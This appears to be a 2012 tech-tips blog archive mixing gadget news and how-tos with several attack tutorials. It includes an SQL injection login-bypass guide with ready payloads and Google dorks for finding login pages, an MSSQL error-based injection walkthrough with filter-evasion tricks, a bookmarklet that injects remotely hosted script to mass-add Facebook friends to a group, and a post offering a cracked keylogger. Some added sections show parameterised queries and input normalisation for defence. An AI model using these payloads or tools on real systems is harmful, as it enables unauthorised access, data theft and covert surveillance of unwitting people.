
Thursday, May 17, 2012

Add all your Facebook friends to a group in one click.

You can add all your Facebook friends to a group by preparing a script using the following method. All it needs is the group ID and a web hosting site you are registered with.

Step 1: Find the group ID.

'10736816604104' is the group ID in the link above. If the group ID is not in numerical form, open the group, right-click on "Report group" and open the link in a new tab.

Here you can see the group ID, which is equal to the cid '10736816604104' and is numerical.

This group ID number will be used in the script.

Step 2: Download the sample script and edit it.

Download the script, open it in Notepad, find the value '10736816604104', replace it with the ID of the group you want to add friends to, and save the file.

Step 3: Upload the file to a web hosting site.

Use any web hosting site to upload the script and serve it. I use http://www.my3gb.com/; after the upload a link is created for the file.

Example: http://hnk007.my3gb.com/file1.txt

Step 4: Use the script.

Place the created link in the following script at src='http://techtipsandtricks.my3gb.com/file1.txt'.

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://hnk007.my3gb.com/file1.txt';})();

Now copy the script above, open the group and enter the script in the address bar (Mozilla Firefox only); all your friends will be added and the number of friends added to the group is shown.

In other browsers, including Firefox, create a new bookmark with the script as its location. After creating the bookmark, open the group and click the bookmark that holds the script for that group. Wait a few seconds; it will start adding your friends to that group.

SQL injection bypass the login form

In this tutorial I will be explaining what SQL is (its structure), what SQL injection is, how the attack is performed, and how to make your website safe from such attacks. Before you read any other article on SQL injection I recommend you read this first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is the most widely used language, and in most cases MySQL is the database used with PHP. PHP is a web scripting language like ASP, JSP or CGI. You need not learn this attack in every language; the concept of the attack remains the same for all of them.

Basics of SQL:
The structure of SQL is divided into:
SQL server -> Databases -> Tables -> Columns and Rows.
SQL server: an application that runs on the server side and serves requests according to the commands sent by the client.
Database: a container in which the tables belonging to a particular application are kept.
Tables: store the data in the form of rows and columns.

SQL Injection: Introduction

It is one of the most widely used hacking techniques, since most websites today maintain a database. SQL injection is a code (SQL) injection technique that works because of improper filtering of user input. Let's see a basic injection attack:


Bypassing the login form:
Let's consider a login form, login.php:

<?php
if (isset($_POST['submit']))
{
    $username = $_POST['username'];
    $password = $_POST['pass'];
    // Vulnerable on purpose: the form values are concatenated straight into the SQL text
    $check = mysql_query("SELECT * FROM member WHERE username='$username' AND password='$password'");
    $check2 = mysql_num_rows($check);

    if ($check2 == 0)
        echo "login failed";
    else
        header("Location: members.php");
}
else
{
?>
<form action="login.php" method="post" name="login">
<h1>USERLOGIN</h1><br/>
Username: <input type="text" name="username">
<br/><br/>
Password: <input type="password" name="pass">
<input type="submit" name="submit" value="Login">
</form>
<?php
}
?>


This is not an exact login form; I have written this code just to give you a feel for how a login form works. Focus on the lines that build and run the query. As you can see, the login details are sent via the "post" method as soon as the submit button is clicked, and the PHP code then runs because the "isset" condition is true. Now let's see what happens in the background: the SELECT statement tries to fetch the details from the "member" table by comparing the username and password sent from the form with the username and password stored in the member table. Clearly the code I have written is vulnerable; let's see how.
Consider a situation where I have given input like the following:
Username: ' or 'a'='a
Password: ' or 'a'='a
Now let's see what happens in the background, i.e. in the SELECT statement:
select * from member where username='' or 'a'='a' and password='' or 'a'='a'
If you look carefully at the two 'a'='a' comparisons, they both evaluate to "true", so the WHERE clause is true for every row. That means our username and password are accepted.
Some other username and password combinations that can come in handy for SQL injection:

Username: ' or 'a'='a');--
Password: anything

Username: ' or 'a'='a';--
Password: anything

select * from member where username='' or 'a'='a';-- ' and password='anything'
Everything after "--" is treated as a comment, so the password check never runs.


Bypassing the admin login form: in most cases the username of the administrator account is "admin", which is useful when we are injecting code. Let's see:
Username: admin';--
Password: anything

Username: admin');--
Password: anything


Now consider a situation where you know the username and a few letters of the password; in such cases you can try the following:

Username: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='
Password: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='

Google dorks can be used to find login pages:
Example: type inurl:login, inurl:login.php, inurl:adminlogin or intitle:login in the Google search box.

Note: It is not necessary that these combinations will always work. It will depend on the way the script engine is programmed.
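As an added example (not code from the original tutorial), the following Python script rebuilds the login.php logic against an in-memory SQLite table: vulnerable_login concatenates the form values exactly as the PHP above does, while safe_login uses a parameterised query, which is the standard fix. The member rows and the ' or 'a'='a input are constructed, and sqlite3 stands in for MySQL.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the tutorial's "member" table (sqlite3 replaces MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "wonderland")])
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Mirrors login.php: the raw form values are pasted into the SQL text."""
    query = ("SELECT * FROM member WHERE username='" + username
             + "' AND password='" + password + "'")
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return False  # malformed SQL: the login simply fails
    return len(rows) > 0


def safe_login(conn, username, password):
    """Parameterised query: the driver binds the values as data, never as SQL,
    so quotes or OR clauses inside the input cannot change the WHERE logic."""
    rows = conn.execute(
        "SELECT * FROM member WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    conn = build_db()
    # The tutorial's tautology input; the closing quote is supplied by the query itself.
    payload = "' or 'a'='a"
    print("vulnerable:", vulnerable_login(conn, payload, payload))   # True: bypassed
    print("safe:", safe_login(conn, payload, payload))               # False
    print("safe, real creds:", safe_login(conn, "admin", "S3cret!"))  # True
```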

Anonymous operating system

More than 26,000 people have downloaded an operating system which members of the Anonymous hacker group claim to have created.

The software is based on a version of the open-source operating system Linux and comes outfitted with lots of website sniffing and security tools.

The "official" Anonymous group has distanced itself from the software.

In a widely circulated tweet, Anon-ops claimed the operating system was riddled with viruses.

Tool box

The operating system is available via the SourceForge website, a well-known repository for many custom code projects.

The 1.5GB download is based on Ubuntu - one of the most popular versions of the Linux operating system. The software's creators say they put it together for "education purposes to checking the security of web pages (sic)".

It asked people not to use it to destroy webpages.

Soon after the operating system became available, the Anon-ops account on Twitter posted a message saying it was fake and "wrapped in Trojans".

The creators of the OS denied it was infected with viruses adding that, in the world of open-source software, "there were no viruses".

Code check

After downloading and running the software, Rik Ferguson, director of Trend Micro's European security research efforts, said it was "a functional OS with a bunch of pre-installed tools that can be used for things like looking for [database] vulnerabilities or password cracking".

It also included tools such as Tor that can mask a person's online activities. In many ways, he said, it was a pale imitation of a version of Linux known as BackTrack that also comes with many security tools already installed.

Mr Ferguson said he was starting work to find out if there were any viruses or booby-traps buried in the code.

Graham Cluley, senior researcher at hi-tech security firm Sophos, wondered who would be tempted to use it.

"Who would want to put their trust in a piece of unknown software written by unknown people on a webpage that they don't know is safe or not?" he asked.

He warned people to be very wary, adding that some hacktivists keen to support the work of Anonymous had been tricked earlier in the year into installing a booby-trapped attack tool.

"Folks would be wise to be very cautious," he said.

How To Protect Yourself From DNSChanger

DNS Changer

In July the Internet Systems Consortium will permanently shut down DNS servers deployed to serve as temporary surrogates for rogue DNS servers shut down as part of Operation Ghost Click, an FBI operation that brought down an Estonian hacker ring last year. If your PC is one of the more than 1 million computers infected that carry DNSChanger you might unknowingly be relying on one of the FBI's temporary servers to access the Internet, and if you don't eliminate DNSChanger from your PC before the FBI pulls the plug on its servers, you'll be left without Internet access. Read on to learn how to discover whether you're infected with DNSChanger, and what you can do to eliminate it from your system.

How to Tell Whether DNSChanger Has Infected Your PC

To figure out whether you've been infected with DNSChanger, just point your Web browser to one of the (admittedly amateur-looking) DNSChanger Check-Up websites that Internet security organizations maintain across the globe. The link above will take you to a DNS Changer Check-Up page in the United States that the DNS Changer Working Group maintains; if you live outside the United States, you can consult the FBI's list of DNSChanger Check-Up websites to find an appropriate service for your region.

Unfortunately, if your router is infected, those websites will think that your PC is infected, even though it may be clean; worse, if your ISP redirects DNS traffic, your PC may appear to be clean even though your DNS settings may have been maliciously altered. If you want to be certain that your PC is free of DNSChanger malware, you need to manually look up the IP addresses of the DNS servers that your PC contacts to resolve domain names when browsing the Web.

To look up which DNS servers your Windows 7 PC is using, open your Start menu and either run the Command Prompt application or type cmd in the Search field. Once you have a command prompt open, type ipconfig /allcompartments /all at the command line and press Enter. A big block of text should appear; scroll through it until you see a line that says 'DNS Servers', and copy down the string(s) of numbers that follow (there may be more than one string here, meaning that your PC accesses more than one DNS server).

It's even easier for Mac OS X users to determine the IP addresses of the DNS servers that their PC uses. Open the Apple menu (usually located in the upper-left corner of the screen) and select System Preferences. Next, click the Network icon to open your Network Settings menu; navigate to Advanced Settings, and copy down the string(s) of numbers listed in the DNS Server box.

DNS Changer

Once you know the IP addresses of the DNS servers that your PC is using, head over to the FBI DNSChanger website and enter those addresses into the search box. Press the big blue Check Your DNS button, and the FBI's software will tell you whether your PC is using rogue DNS servers to access the Internet.
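
As an added example (not part of the original article), this Python script automates the Windows part of the check: it parses the 'DNS Servers' lines out of ipconfig /all output, including the indented continuation lines and IPv6 entries, and flags any server that falls inside a list of suspect ranges. The ipconfig output is a constructed sample, and SUSPECT_RANGES is a placeholder; the rogue ranges themselves come from the FBI site named above.

```python
import ipaddress
import re

# Constructed sample of `ipconfig /all` output (not from the original article).
# Additional DNS servers are printed on their own indented continuation lines.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : WORKSTATION

Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 192.168.1.20(Preferred)
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 192.0.2.53
                                       198.51.100.7
                                       fec0:0:0:ffff::1%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

# PLACEHOLDER: the real rogue ranges are listed on the FBI DNSChanger site;
# 192.0.2.0/24 is a documentation range used only so the sample produces a hit.
SUSPECT_RANGES = [ipaddress.ip_network("192.0.2.0/24")]

# ipconfig field lines end their dot leader with ". :"; continuation lines do not.
FIELD_RE = re.compile(r"^\s*(.*?)\s*\.\s*:\s*(.*)$")


def parse_dns_servers(text):
    """Collect every address listed under 'DNS Servers' in ipconfig output."""
    servers, collecting = [], False
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            collecting = m.group(1).startswith("DNS Servers")
            candidate = m.group(2) if collecting else ""
        elif collecting and line.startswith(" "):
            candidate = line            # continuation line: address only
        else:
            collecting, candidate = False, ""
        candidate = candidate.strip().split("%")[0]   # drop IPv6 zone index
        if candidate:
            try:
                servers.append(ipaddress.ip_address(candidate))
            except ValueError:
                pass                    # not an address, ignore
    return servers


def check_servers(servers, suspect_ranges=SUSPECT_RANGES):
    """Return the servers that fall inside any suspect range."""
    return [s for s in servers if any(s in net for net in suspect_ranges)]


if __name__ == "__main__":
    found = parse_dns_servers(SAMPLE_IPCONFIG)
    print("DNS servers:", [str(s) for s in found])
    print("suspect:", [str(s) for s in check_servers(found)])
```

On a real machine, pipe the output of ipconfig /all into parse_dns_servers and replace SUSPECT_RANGES with the ranges published by the FBI.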
What to Do If Your PC Is Infected by DNSChanger

If your PC is infected with DNSChanger, you'll have to do some intensive work to get rid of it. DNSChanger is a powerful rootkit that does more than just alter DNS settings; if you've been infected with DNSChanger, your safest course is to back up your important data, reformat your hard drive(s), and reinstall your operating system.

If you're leery of reformatting your entire PC, you can try rooting out the DNSChanger rootkit with a free rootkit removal utility such as Kaspersky Labs' TDSSKiller. As the name implies, Kaspersky released the program to help PC owners seek and destroy the TDSS rootkit malware, but it also detects and attempts to eliminate DNSChanger and many other forms of rootkits.

If the infected PC is on a network, you'll have to check every other PC on the network for signs of infection, and then check your router's settings to ensure that it isn't affected (DNSChanger is programmed to change router DNS settings automatically, using the default usernames and passwords of most modern routers). To do this, copy down your router's DNS server IP addresses (located in your router's settings menu) and check them against the FBI's IP address database mentioned above. If your router is infected, reset the router and confirm that all network settings are restored to the manufacturer's defaults.

When you're done, repeat the steps outlined above to verify that your PC is no longer infected with DNSChanger. With all traces of this vicious malware eliminated, you should have nothing to fear when the FBI shuts down the ISC's temporary DNS servers in July.

Windows 8 Beta Download (Consumer Preview)

Windows 8 is the official name for the next version of Microsoft Windows, a series of operating systems produced by Microsoft for use on personal computers, including home and business desktops, laptops, netbooks, tablet PCs, and media center PCs. According to unofficial sources, the release date for Windows 8 has been set for October 2012, three years after the release of its predecessor, Windows 7. Windows 8's server counterpart, Windows Server 2012, is in development concurrently with Windows 8. The most recent officially released pre-release version is the Consumer Preview, which was released on February 29, 2012. An almost-complete Release Preview is scheduled for June 5, 2012.

Unlike Windows 7, which was intended to be a more focused, incremental upgrade to the Windows line, Windows 8 has been “re-imagined from the chip-set to the user experience” to connect more with the user. It features the Metro interface that is designed for touchscreen input similar to that in Windows Phone and on the Xbox 360. A version of Windows 8, called Windows RT, also adds support for the ARM processor architecture in addition to the previously supported microprocessors from Intel and AMD.

Downloading Windows 8 Beta

Windows setup (with tools to create an ISO or thumb drive)

http://windows.microsoft.com/en-US/windows-8/download

ISO image (use Disk Image burner or USB tool)

http://windows.microsoft.com/en-US/windows-8/iso


Tuesday, May 15, 2012

Keyboard Dancing LED Light Trick

Today I am going to show you an interesting trick which will make your keyboard LEDs dance. Basically we will create a VBScript that toggles Caps Lock, Num Lock and Scroll Lock over and over. So let's get started.

How to do that?
  1. Open Notepad and copy the code below into it.

' Toggle the three lock keys every 100 ms until the script is killed
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 100
    wshShell.SendKeys "{CAPSLOCK}"
    wshShell.SendKeys "{NUMLOCK}"
    wshShell.SendKeys "{SCROLLLOCK}"
Loop

  2. Then save this file as led.vbs (the .vbs extension is a must).
  3. Open your saved file and watch your keyboard LEDs blink like disco lights.

How to disable the blinking LEDs?
  1. First open Task Manager [Ctrl+Alt+Del].
  2. Then go to the Processes tab.
  3. Select wscript.exe.
  4. Click on End Process.

Google would develop its own processors for their Android devices


A surprising rumor appeared on the net today. It is said that Google may be developing its own processor and GPU for use in future Android devices, giving the search company more control over the hardware.
It seems Google wants hardware with a longer life cycle than usual, so as not to depend on third parties for the development and future of Android, and to let Google itself set the pace of hardware evolution, as Apple does by designing the ARM processors for its iOS devices.
No more details are known, but the rumor is that Google might try to design a processor and GPU with the minimum requirements to run Android, forcing developers to optimize applications and games for that Google-designed processor and avoiding the fragmentation that is occurring now across processors.
The first device that could use a Google-brand processor could be the Nexus due at the end of 2012, which could also be manufactured by Motorola, now owned by Google, to offer the first mobile 100% designed by Google.

Wednesday, May 9, 2012

Read and write Indian languages in your Android phone

We know that Android is not Indian-developed software, so as usual it does not support Indian languages on almost all phones. But we Indians are clever enough to do it ourselves. Here I will tell you how to install and read Indian languages like Gujarati, Hindi, Kannada and Telugu on your Android phone.

All you have to do is copy the .ttf font of your choice to the system/font directory.
But it is not so easy, because Android will not let you access your phone's root directory.

We can get around that with the method called rooting.
For more information:
http://www.tech-inside.in/p/android-tricks.html

It is an easy process, but at the same time it carries risk: it may wipe or brick your phone.


Here is what you have to do:

1. Enable USB debugging on your phone by going to Settings –> Applications –> Development. Check the 'USB Debugging' option.

2. Make sure you have an SD card inserted and mounted in your phone.

3. Download the GingerBreak application from XDA Developers and get it onto your phone.

4. Install it by browsing to the GingerBreak APK from your file manager.

5. Open the GingerBreak application from your menu and press the root button. Wait for a few minutes. If there are no problems, the device will reboot itself (the reboot will take quite some time). After the reboot you will see a SuperUser app alongside your system applications. Open it and check that it is working.

That's it, you have rooted your phone.


INSTALL INDIAN FONTS

  1. Download the font you want for any language (file type: ttf) from the market or from the internet.
  2. Go to the Android Market from your phone, search for and install "Font Changer", and open it after installing.
  3. It will say "BUSYBOX IS NOT INSTALLED IN YOUR PHONE, DO YOU WANT TO DOWNLOAD IT FROM MARKET?" Press OK and install it (while installing it may say that BusyBox is already installed in your phone; don't mind it).
  4. Now open Font Changer and go to Options -> Settings -> Fonts location and give your font location; if it is in the download folder of the SD card, give it as /sd card/downloads.
  5. Now you can see your font in Font Changer; press on it and apply.
  6. It will ask to reboot; press OK.
  7. Now it will display all fonts, including English.
  8. You can read Gujarati, Hindi, etc. newspapers from your default browser.
  9. Now you can read all websites that are in Gujarati or Hindi.


Tuesday, May 8, 2012

Android's Update to 5.0 (Jelly Bean)

While most of us are still waiting for our devices to upgrade to the latest version of Android, 4.0 (Ice Cream Sandwich), the next version of Google's operating system is already being talked about. There are rumors that the next version, now known as Android 5.0 (Jelly Bean), will be released within the next four months of this year, and that the new version is expected to be used officially in tablets and notebooks, supporting high-end screen resolutions.

Android 5.0 (Jelly Bean) would support dual boot with Chrome OS, so that Google devices can carry both operating systems. This would be good for laptops, which would have a normal Android operating system plus a quick start into Chrome OS for browsing only.

Android Hub, the music box from Google

A few days ago I talked about the augmented reality glasses being developed by Google; today we bring you news that Google is also interested in creating an entertainment system for listening to music wirelessly.
The news was uncovered by the Wall Street Journal, which reports that the device will be released under the Google brand. The name of the device is not known, but some sources suggest it will be called Android Hub and that it will be on the market later this year.
No further details of the device are known; we can only guess that it will run some version of Android, and that Google Music (or a similar cloud-based service) will be responsible for bringing music to the mysterious black box, which one source suggests has speakers.
Others speculate that it would be a set-top box without speakers, with WiFi connectivity, ARM-based hardware and a price not exceeding $100. Perhaps it would be governed by an evolution of the Google TV operating system and leave the Android Hub name behind; in that case we would be talking about more than just a device to play music wirelessly.
Finally, it is also said that Android tablets and smartphones would act as the controls for the device and share content with it.
We have no choice but to wait for more complete information or leaks; if you think it appropriate, share with us what you would like to see. Surely at the upcoming Google I/O, June 27 to 29, we will learn more.
At last year's Google I/O there was a demonstration of Project Tungsten, which could be related to the mysterious device discussed in the news (at 46:45):

NOKIA Mobile Hidden Code List

On the main screen of your Nokia mobile phone, type in:
  1. *#06# to check the IMEI (International Mobile Equipment Identity).
  2. *#7780# reset to factory settings.
  3. *#67705646# clears the LCD display (operator logo).
  4. *#0000# to view the software version.
  5. *#2820# to show the Bluetooth device address.
  6. *#746025625# SIM clock allowed status.
  7. #pw+1234567890+1# shows whether the SIM has restrictions.
  8. *#92702689# takes you to a secret menu where you may find some of the information below:
     - the serial number
     - the month and year of manufacture
     - the date the phone was purchased, if recorded (MMYY)
     - the date of the last repair, if any (0000)
     - the life timer of the phone (time passed since last start)
  9. *#3370# Enhanced Full Rate Codec (EFR) activation. Increases signal strength and gives better signal reception. It also helps if you want to use GPRS and the service is not responding or is too slow. The phone battery will drain faster though.
  10. *#3370* (EFR) deactivation. The phone will automatically restart. Increases battery life by 30% because the phone receives less signal from the network.
  11. *#4720# Half Rate Codec activation.
  12. *#4720* Half Rate Codec deactivation. The phone will automatically restart.
  13. If you forgot the wallet code for a Nokia S60 phone, use this reset code: *#7370925538#
  14. Press *#3925538# to delete the contents and code of the wallet.
  15. Unlock service provider: insert the SIM, turn the phone on and press volume up (arrow keys) for 3 seconds; it should say "pin code". Press C, then press *; the message should flash. Press * again and enter 04*pin*pin*pin#
  16. *#7328748263373738# resets the security code.
Note: your data in the wallet will be erased. The phone will ask you for the lock code. The default lock code is 12345.
The default security code is 12345.

Top Ranked Free RSS Feed And Blog Directories List Updated 2012

Today I'm going to share the top-ranked free RSS feed directories and free blog directories, and how to use them to drive more traffic to your blog. Nowadays there are many ways to promote your website online; the most widely used and most efficient way to promote your blog and drive serious traffic is to submit it to RSS feed directories and popular blog directories.

Signing up to some top-performing blog directories and RSS feed directories will create quality backlinks and expose your site to many potential visitors and to all search engines. Adding your blog to these directories should result in an increase in site traffic. Though RSS feed directories perform better, submitting your site to both RSS feed directories and blog directories is equally important.
The directories in the list below are very popular and have a page rank of more than 5. Submit your sites to these directories and get your site listed on the first page of search engines. Driving traffic from RSS feed directories and blog directories will be discussed in coming posts.
Page rank 9

Page rank 8

Directories With PR 6


Directories With PR 5

Monday, May 7, 2012

Add Your Signature In Your WebSite

If you look at the bottom of the posts in many blogs you will see they finish with a signature. I think the signature looks great and adds a bit of style to the posts. These signatures are very easy to create and add to your blog. You can either use a small pad to write your signature or pick one of hundreds of pre-made signatures. I suggest using a pre-made signature; using the pad to create your actual signature is almost impossible.

Create the signature

I'm going to create another signature and walk you through the steps as I do.

Step 1. Go to My Live Signature and click 'Start Now'; you don't need to register.

Step 2. You have two free options here: use the wizard as I did, or be brave and try to write one.

Write in your name as i did below :


Choose the font you want to use from the hundreds they have and click next as below :


Follow the steps to design the signature:

- Now choose the size; I chose size 3.
- Select the color; I chose a transparent background.
- Choose the angle slant; I chose 1.

Now your signature is ready; click on 'Want to use this signature?'

Now choose 'Generate html code' and you will be provided with the code:

This is the code for my new signature:
<a href="http://www.mylivesignature.com" target="_blank"><img src="http://signatures.mylivesignature.com/85996/hnk001/9cd677917441d86e6577582f125779ad.png" border="0" style="border: 0 !important; background: transparent;" /></a>
If you know how to upload the image to Blogger, Photobucket or any image host you may want to do that; if not, don't worry, we will use it as it is.

We only want the image, and we don't want the image to be a link back to My Live Signature, so remove the surrounding <a href="..."> and </a> tags and keep only the <img ...> tag:
(If you're not sure how, just change www.mylivesignature.com to the address of your blog)
<img src="http://signatures.mylivesignature.com/85996/hnk001/9cd677917441d86e6577582f125779ad.png" border="0" style="border: 0 !important; background: transparent;" />
Add the signature to your blog

There are two ways to add the signature to your blog. The first way is the easiest, but the signature won't appear in your previous posts.
The second way adds it directly to your template.

First way to add the signature to your blog.

1. Click 'Settings' in your dashboard and then choose 'Formatting' in the top menu as below:






2. Scroll down to 'Post Template', paste in the code and save:

Now every time you go to write a post the signature will already be in the post.

Second way to add the signature to your blog.

In your dashboard click 'Design' > 'Edit Html' and tick the 'Expand Widget Templates' box:

Find the following code in your blog's HTML:
(Press Ctrl+F for a search bar to find the code)
<data:post.body/>

Paste the code for your signature directly below (after) <data:post.body/>

Note: if <data:post.body/> is in your template twice, place it after the second one.

Now save your template and your signature has been added. If you have any trouble or need more help, leave a comment below.

Drop Your Comments And Questions Below.

Award Key Logger (Full version) for FREE!!

Get one of the best, award-winning key-loggers, "Award Key Logger", for free! And the full version at that!
Download it here -

The downloaded folder will have 3 files: 1. a Notepad file, 2. the installation file, 3. an .exe file.

Run the installation file and go to the folder where you installed the logger (at this point the logger is the TRIAL version).

Copy the .exe file from the downloaded folder and paste it into the folder where the logger has been installed, replacing the default .exe file with the one from the downloaded folder.

Now the logger is the full version! :)

Some of the key features of this logger -

1.Highly efficient .
2.Never misses any log.
3.Screenshots of high quality are taken.
4.Every keystroke is recorded.

Have fun ! :)

Saturday, May 5, 2012

SQL Injection - Bypassing Single Quotes

You found a SQL injection in a web site, but you need to bypass some security controls; below are the steps taken.
Applicable to Microsoft SQL Server 200x, although the methodology works for every database.

Step 1: We found a SQL error in the web app by adding letters to a numeric field:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019tech

And therefore we got something like:

[SQLServer JDBC Driver][SQLServer]Incorrect syntax near 'tech'.

Every time you get a SQL error in the response, it means your input was executed by the DB engine, and therefore that input field is injectable.

Then we confirm this by adding a SQL clause like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 having 1%3d1

And we get a Syntax error confirming our input is being executed as SQL commands:

[SQLServer JDBC Driver][SQLServer]Column 'db.dbo.table.field' is invalid in the HAVING clause because it is not contained in either an aggregate function or the GROUP BY clause.

NOTE: Every app is different, so you will need to work out your own injection string; in my case I do not need to add comments "--" at the end or single quotes (so far).

Step 2: Trying to get the DB engine and version via (select @@version)

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select @@version)

And we notice no response is returned!

Escalation 1: It looks like a filter on the server side is not letting the information back out, so a good trick is to get the information via a SQL error message, commonly by trying to convert a string into an integer. So we will try that:

e.g. select char(@@version)

Whole URL:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select char(@@version))

The DB will try to convert the string into an integer, which is not possible, and therefore an error will be generated that carries our information:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (X64) Dec 10 2010 10:38:40 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1) ' to data type int

From now on in this pentest we know we will need to do this kind of conversion to get the information we want.

Step 3: Let's try to get database names by injecting:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases)

And we get the default one, "master", in the SQL error:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'master' to data type int.

Step 4: Now we can start searching for more databases so we do something like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where NAME not like 'master')

BUT we notice our single quotes are being escaped (doubled):

019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like ''master%'')

Escalation 2: We use the MSSQL CHAR() function to avoid single quotes, so we inject something like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2bchar(37)

char(109) = m
%2b = +
char(37) = %

Result: name not like CHAR(109)+CHAR(37)
Or in human-readable syntax: name not like 'm%'

But when we inject it we again get no response, which means a server-side filter is detecting these attempts. This is where you need to start thinking about how to bypass the filter. After some minutes I decided to break the pattern by adding a horizontal tab (ASCII 09 decimal) as whitespace between the tokens: char(109)%2b%09char(37):

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2b%09char(37))

And guess what:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'tempdb' to data type int.

We got the second default DB, which means Game Over! We can dump the whole database and, if we are lucky, we could escalate it and get a remote shell (out of scope of this article).

We could start getting more database names by discarding the ones we already got, something like:

where name not like 'master' and name not like 'tempdb' and name not like ..... using the above instructions.

The next immediate step would be to start listing the tables from the DB and then the fields of those tables, like:

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
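The lesson from the tab bypass above is that a filter must normalise the parameter before matching. As an added example that is not part of the original post, here is a C# normaliser that URL-decodes, folds whitespace and rewrites CHAR() chains back into the literal they build, then runs a few detection rules over the result; the rule names and sample values are constructed for the demo.

```csharp
using System;
using System.Collections.Generic;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;

// Added example (not the original post's code): fold the %09 tab and CHAR() tricks
// shown above back into the plain payload before any pattern filter looks at it.
public static class SqliNormaliser
{
    // One CHAR(n) token, and a chain of them joined by '+' with any whitespace between.
    static readonly Regex CharToken = new Regex(@"char\s*\(\s*(\d{1,3})\s*\)", RegexOptions.IgnoreCase);
    static readonly Regex CharChain = new Regex(@"char\s*\(\s*\d{1,3}\s*\)(\s*\+\s*char\s*\(\s*\d{1,3}\s*\))*", RegexOptions.IgnoreCase);
    static readonly Regex AnySpace = new Regex(@"\s+");
    // Detection rules (names constructed here), evaluated against the normalised value only.
    static readonly Dictionary<string, Regex> Rules = new Dictionary<string, Regex>
    {
        { "boolean-subselect", new Regex(@"\b(or|and)\s+\d+\s+in\s*\(\s*select\b") },
        { "mssql-catalog",     new Regex(@"\b(sysdatabases|sysobjects|syscolumns)\b") },
        { "string-literal",    new Regex(@"'[^']*'") },
    };

    // 1) URL-decode (%09 -> tab, %2b -> '+'), 2) fold every whitespace run to one space,
    // 3) rewrite CHAR() chains into the literal they build, 4) lower-case for the rules.
    public static string Normalise(string rawParam)
    {
        string s = AnySpace.Replace(WebUtility.UrlDecode(rawParam), " ");
        s = CharChain.Replace(s, m =>
        {
            var literal = new StringBuilder("'");
            foreach (Match t in CharToken.Matches(m.Value))
                literal.Append((char)int.Parse(t.Groups[1].Value));
            return literal.Append('\'').ToString();
        });
        return s.Trim().ToLowerInvariant();
    }

    public static List<string> MatchedRules(string rawParam)
    {
        string n = Normalise(rawParam);
        var hits = new List<string>();
        foreach (KeyValuePair<string, Regex> rule in Rules)
            if (rule.Value.IsMatch(n)) hits.Add(rule.Key);
        return hits;
    }

    public static void Main()
    {
        // Constructed 'ratio' values: the benign one and the tab bypass from the walkthrough.
        string[] samples = { "019",
            "019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2b%09char(37))" };
        foreach (string s in samples)
            Console.WriteLine("{0}\n  normalised: {1}\n  rules: {2}", s, Normalise(s), string.Join(", ", MatchedRules(s)));
    }
}
```

The second sample normalises to `... where name not like 'm%')` and trips all three rules, whereas a filter matching the raw string sees neither a quote nor a plain space after the `+`. Normalisation narrows the bypass surface but is no substitute for parameterised queries.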

Well known references:

1. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

Hope this helps.

Friday, May 4, 2012

New Features in C# 4.0

Visual Studio 2010 is out and we have a new version of C# that also accompanies it. That's C# 4.0 - I have been working on C# from the good old 1.0 or 1.1 version upwards. So what's the new 4.0 version of C# got in store for you? Here's a wrap-up of the new features available as part of the C# 4.0 release.

The dynamic Keyword

There's a new kid on the block with the introduction of a key feature of this release: the dynamic keyword. The dynamic keyword bridges the gap that existed between dynamically and statically typed languages. Well, C# can now also be considered a dynamically typed language too. You can easily create dynamic objects on the fly and even have their types determined only at run time. You simply need to add a new namespace called System.Dynamic, and lo, you can create expandable objects and even advanced class wrappers. You can also facilitate interoperability between different languages, including the dynamic ones.

To better understand the use of dynamic keyword, here's an example:

dynamic BankAccount = new ExpandoObject();
BankAccount.Number = "174258733-451269";
BankAccount.HolderName = "Jason S";
BankAccount.Branch = "Bangalore";


Though there are many pros and cons to the use of the dynamic keyword, and it carries a performance overhead, it makes life that much simpler for the developer in the end.

Optional (or Default) Method Parameters

